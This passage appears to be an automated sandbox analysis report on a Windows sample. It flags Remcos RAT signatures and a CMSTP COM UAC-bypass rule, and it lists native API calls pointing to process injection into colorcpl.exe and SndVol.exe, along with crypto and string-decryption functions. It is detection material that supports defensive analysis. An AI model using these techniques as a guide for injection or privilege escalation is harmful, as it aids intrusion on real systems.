Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D8730 NtQueueApcThread,	0_2_029D8730
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D7A2C NtAllocateVirtualMemory,	0_2_029D7A2C
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029DDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_029DDC8C
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029DDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_029DDC04
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D7D78 NtWriteVirtualMemory,	0_2_029D7D78
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029DDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_029DDD70
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D8D70 GetThreadContext,SetThreadContext,NtResumeThread,	0_2_029D8D70
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D8D6E GetThreadContext,SetThreadContext,NtResumeThread,	0_2_029D8D6E
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D7A2A NtAllocateVirtualMemory,	0_2_029D7A2A
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029DDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_029DDBB0
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 10_2_02A38730 NtQueueApcThread,	10_2_02A38730
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 10_2_02A37A2C NtAllocateVirtualMemory,	10_2_02A37A2C
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 10_2_02A3DD70 NtOpenFile,NtReadFile,NtClose,	10_2_02A3DD70
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 10_2_02A37D78 NtWriteVirtualMemory,	10_2_02A37D78
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 10_2_02A37A2A NtAllocateVirtualMemory,	10_2_02A37A2A
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029B8730 NtQueueApcThread,	12_2_029B8730
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029B7A2C NtAllocateVirtualMemory,	12_2_029B7A2C
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029B7D78 NtWriteVirtualMemory,	12_2_029B7D78
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029BDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	12_2_029BDD70
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029B7A2A NtAllocateVirtualMemory,	12_2_029B7A2A
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029BDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	12_2_029BDBB0
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029BDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	12_2_029BDC8C
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029BDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	12_2_029BDC04
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029B8D70 GetThreadContext,SetThreadContext,NtResumeThread,	12_2_029B8D70
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029B8D6E GetThreadContext,SetThreadContext,NtResumeThread,	12_2_029B8D6E

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029D8788 CreateProcessAsUserW,

0_2_029D8788

Contains functionality to shutdown / reboot the system

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027D67EF ExitWindowsEx,LoadLibraryA,GetProcAddress,	8_2_027D67EF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027D67EF ExitWindowsEx,LoadLibraryA,GetProcAddress,	11_2_027D67EF
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,	13_2_028167EF

Detected potential crypto function

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029C20C4	0_2_029C20C4
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A6671B	0_2_02A6671B
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A6E42F	0_2_02A6E42F
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A7E5FA	0_2_02A7E5FA
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A6E9BE	0_2_02A6E9BE
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A9A93B	0_2_02A9A93B
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A94FD9	0_2_02A94FD9
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A7AF67	0_2_02A7AF67
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A6F067	0_2_02A6F067
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A65183	0_2_02A65183
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A6F1D0	0_2_02A6F1D0
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A856AC	0_2_02A856AC
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A9B769	0_2_02A9B769
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A8547D	0_2_02A8547D
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A5B595	0_2_02A5B595
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A85B38	0_2_02A85B38
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A858DB	0_2_02A858DB
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A8D800	0_2_02A8D800
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A7FD80	0_2_02A7FD80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_02806270	8_2_02806270
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_028133AB	8_2_028133AB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027FE34B	8_2_027FE34B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F706A	8_2_027F706A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027D4005	8_2_027D4005
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_028141D9	8_2_028141D9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027FE11C	8_2_027FE11C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F81E8	8_2_027F81E8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027DF18B	8_2_027DF18B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F87F0	8_2_027F87F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027E742E	8_2_027E742E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F7566	8_2_027F7566
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027FE5A8	8_2_027FE5A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027E7AD7	8_2_027E7AD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_0280DA49	8_2_0280DA49
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027DDBF3	8_2_027DDBF3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F797E	8_2_027F797E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F39D7	8_2_027F39D7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027FDEED	8_2_027FDEED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F5EEB	8_2_027F5EEB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027E6E9F	8_2_027E6E9F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027E7C40	8_2_027E7C40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F7DB3	8_2_027F7DB3
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 10_2_02A220C4	10_2_02A220C4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_02806270	11_2_02806270
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_028133AB	11_2_028133AB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027FE34B	11_2_027FE34B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F706A	11_2_027F706A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027D4005	11_2_027D4005
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_028141D9	11_2_028141D9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027FE11C	11_2_027FE11C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F81E8	11_2_027F81E8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027DF18B	11_2_027DF18B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F87F0	11_2_027F87F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027E742E	11_2_027E742E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F7566	11_2_027F7566
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027FE5A8	11_2_027FE5A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027E7AD7	11_2_027E7AD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0280DA49	11_2_0280DA49
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027DDBF3	11_2_027DDBF3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F797E	11_2_027F797E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F39D7	11_2_027F39D7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027FDEED	11_2_027FDEED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F5EEB	11_2_027F5EEB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027E6E9F	11_2_027E6E9F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027E7C40	11_2_027E7C40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F7DB3	11_2_027F7DB3
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029A20C4	12_2_029A20C4
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02846270	13_2_02846270
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028533AB	13_2_028533AB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0283E34B	13_2_0283E34B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02814005	13_2_02814005
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0283706A	13_2_0283706A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0281F18B	13_2_0281F18B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028541D9	13_2_028541D9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028381E8	13_2_028381E8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0283E11C	13_2_0283E11C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028387F0	13_2_028387F0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0282742E	13_2_0282742E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0283E5A8	13_2_0283E5A8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02837566	13_2_02837566
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02827AD7	13_2_02827AD7
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0284DA49	13_2_0284DA49
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0281DBF3	13_2_0281DBF3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028339D7	13_2_028339D7
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0283797E	13_2_0283797E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02826E9F	13_2_02826E9F
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02835EEB	13_2_02835EEB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0283DEED	13_2_0283DEED
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02827C40	13_2_02827C40
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02837DB3	13_2_02837DB3

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: String function: 029C4500 appears 33 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: String function: 029C4860 appears 949 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: String function: 02A7C400 appears 45 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: String function: 029D89D0 appears 45 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: String function: 029C46D4 appears 244 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: String function: 029D894C appears 56 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: String function: 029C44DC appears 74 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027C1FAB appears 38 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027C20DF appears 40 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0280854A appears 36 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 02805951 appears 56 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027C46F7 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 02817AA8 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027C2213 appears 38 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027D1FA2 appears 32 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027C417E appears 46 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027C52FD appears 32 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027F4801 appears 82 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027C2093 appears 100 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027C1E65 appears 68 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027F4E70 appears 108 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 02801E65 appears 34 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 02834801 appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 02802093 appears 50 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 02834E70 appears 54 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: String function: 029A46D4 appears 155 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: String function: 029B894C appears 50 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: String function: 02A246D4 appears 155 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: String function: 02A24860 appears 683 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: String function: 029A4860 appears 683 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: String function: 02A3894C appears 50 times

Sample file is different than original file name gathered from version info

Source: D2pQ4J4GGZ.exe	Binary or memory string: OriginalFilename vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2175474410.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2149724742.00000000024CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.0000000021833000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FB1F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FB1F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2031234000.000000007FD2F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020700000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2032127390.00000000024C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2032127390.00000000024C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.0000000021862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2149724742.00000000024C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe

Uses 32bit PE files

Source: D2pQ4J4GGZ.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Yara signature match

Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
